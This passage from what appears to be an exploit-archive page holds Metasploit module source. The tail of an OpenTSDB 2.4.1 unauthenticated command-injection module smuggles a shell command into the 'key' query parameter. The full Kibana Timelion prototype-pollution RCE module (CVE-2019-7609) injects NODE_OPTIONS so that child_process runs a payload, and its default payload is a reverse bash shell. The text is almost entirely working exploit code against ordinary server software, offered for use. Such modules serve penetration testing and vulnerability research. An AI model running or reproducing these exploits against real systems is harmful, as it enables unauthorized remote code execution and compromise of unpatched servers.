'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')    end    if metrics.empty?      fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')    end    # select a random metric since any will do    @metric = metrics.sample    print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")  end  def select_aggregator    # check the configured aggregators and select one at random    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'aggregators')    })    unless res      fail_with(Failure::Unknown, 'Connection failed.')    end    unless res.code == 200      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")    end    begin      aggregators = JSON.parse(res.body)    rescue JSON::ParserError      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')    end    unless aggregators.is_a?(Array)      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')    end    if aggregators.empty?      fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')    end    # select a random aggregator since any will do    @aggregator = aggregators.sample    print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")  end  def execute_command(cmd, _opts = {})    # we need to percent encode the entire command.    # however, the + character cannot be used and percent encoding does not help for it. so we need to change chmod +x with chmod 744    cmd = CGI.escape(cmd.gsub('chmod +x', 'chmod 744'))    start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data    start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')    end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data    end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')    get_vars = {      'start' => start_value,      'end' => end_value,      'm' => "#{@aggregator}:#{@metric}",      'o' => 'axis+x1y2',      'ylabel' => Rex::Text.rand_text_alphanumeric(8..12),      'y2label' => Rex::Text.rand_text_alphanumeric(8..12),      'yrange' => '[0:]',      'y2range' => '[0:]',      'key' => "%3Bsystem%20%22#{cmd}%22%20%22",      'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",      'style' => 'linespoint'    }    exploit_uri = '?'    get_vars.each do |key, value|      exploit_uri += "#{key}=#{value}&"    end    exploit_uri += 'json'    # using a raw request because cgi was leading to encoding issues    send_request_raw({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)    }, 0) # we don't have to wait for a reply here  end  def exploit    select_metric    select_aggregator    print_status('Executing the payload')    execute_command(payload.encoded)  endend

OpenTSDB 2.4.1 Unauthenticated Command Injection

Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This leads to an arbitrary command execution with permissions of the Kibana process on the host system. Exploitation will require a service or system reboot to restore normal operation. The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a docker image caused 6 shells.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ManualRanking  include Msf::Exploit::Remote::HttpClient  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kibana Timelion Prototype Pollution RCE',        'Description' => %q{          Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer.          An attacker with access to the Timelion application could send a request that will attempt to execute          javascript code. This leads to an arbitrary command execution with permissions of the          Kibana process on the host system.          Exploitation will require a service or system reboot to restore normal operation.          The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells          (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a          docker image caused 6 shells.          Tested against kibana 6.5.4.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Michał Bentkowski', # original PoC, analysis          'Gaetan Ferry' # more analysis        ],        'References' => [          [ 'URL', 'https://github.com/mpgn/CVE-2019-7609'],          [ 'URL', 'https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/'],          [ 'CVE', '2019-7609']        ],        'Platform' => ['unix'],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [ 'Automatic Target', {}]        ],        'DisclosureDate' => '2019-10-30',        'DefaultTarget' => 0,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/unix/reverse_bash',          'WfsDelay' => 10 # can take a minute to run        },        'Notes' => {          # the webserver doesn't die, but certain requests no longer respond before a timeout          # when things go poorly          'Stability' => [CRASH_SERVICE_DOWN],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(5601),        OptString.new('TARGETURI', [ true, 'The URI of the Kibana Application', '/'])      ]    )  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'kibana'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200    # this pulls a big JSON blob that we need as it has the version    unless %r{<kbn-injected-metadata data="([^"]+)"></kbn-injected-metadata>} =~ res.body      return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")    end    version_json = CGI.unescapeHTML(Regexp.last_match(1))    begin      json_body = JSON.parse(version_json)    rescue JSON::ParserError      return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")    end    return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") if json_body['version'].nil?    @version = json_body['version']    if Rex::Version.new(@version) < Rex::Version.new('5.6.15') ||       (         Rex::Version.new(@version) < Rex::Version.new('6.6.1') &&         Rex::Version.new(@version) >= Rex::Version.new('6.0.0')       )      return CheckCode::Appears("Exploitable Version Detected: #{@version}")    end    CheckCode::Safe("Unexploitable Version Detected: #{@version}")  end  def get_xsrf    vprint_status('Grabbing XSRF Token')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'bundles', 'canvas.bundle.js'),      'keep_cookies' => true    )    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200    return Regexp.last_match(1) if /"kbn-xsrf":"([^"]+)"/ =~ res.body    nil  end  def trigger_socket    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'socket.io/'), # trailing / is required      'keep_cookies' => true,      'headers' => {        'kbn-xsrf' => @xsrf      },      'vars_get' => {        'EIO' => 3,        'transport' => 'polling'      }    )    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200  end  def send_injection(reset: false)    if reset      pload = ".es(*).props(label.__proto__.env.AAAA='').props(label.__proto__.env.NODE_OPTIONS='')"    else      # we leave a marker for our payload to avoid having .to_json process it and make it unusable by the host OS      pload = %|.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("PAYLOADHERE");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')|    end    body = {      'sheet' => [pload],      'time' => {        'from' => 'now-15m',        'to' => 'now',        'mode' => 'quick',        'interval' => 'auto',        'timezone' => 'America/New_York'      }    }    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'api', 'timelion', 'run'),      'method' => 'POST',      'ctype' => 'application/json',      'headers' => { 'kbn-version' => @version },      'data' => body.to_json.sub('PAYLOADHERE', payload.encoded.gsub("'", "\\\\\\\\\\\\\\\\'")),      'keep_cookies' => true    )    Rex.sleep(2) # let this take hold, if we go too fast we dont get the shell    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200  end  def exploit    check if @version.nil?    print_status('Polluting Prototype in Timelion')    send_injection    @xsrf = get_xsrf    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to grab XSRF token") if @xsrf.nil?    print_status('Trigginger payload execution via canvas socket')    trigger_socket    print_status('Waiting for shells')    Rex.sleep(datastore['WFSDELAY'] / 10)    unless @reset_done      print_status('Unsetting to stop raining shells from a lacerated kibana')      send_injection(reset: true)      trigger_socket    end  end  def on_new_session(_client)    return if @reset_done    print_status('Unsetting to stop raining shells from a lacerated kibana')    send_injection(reset: true)    trigger_socket    @reset_done = true  ensure    super  endend

Tag

#js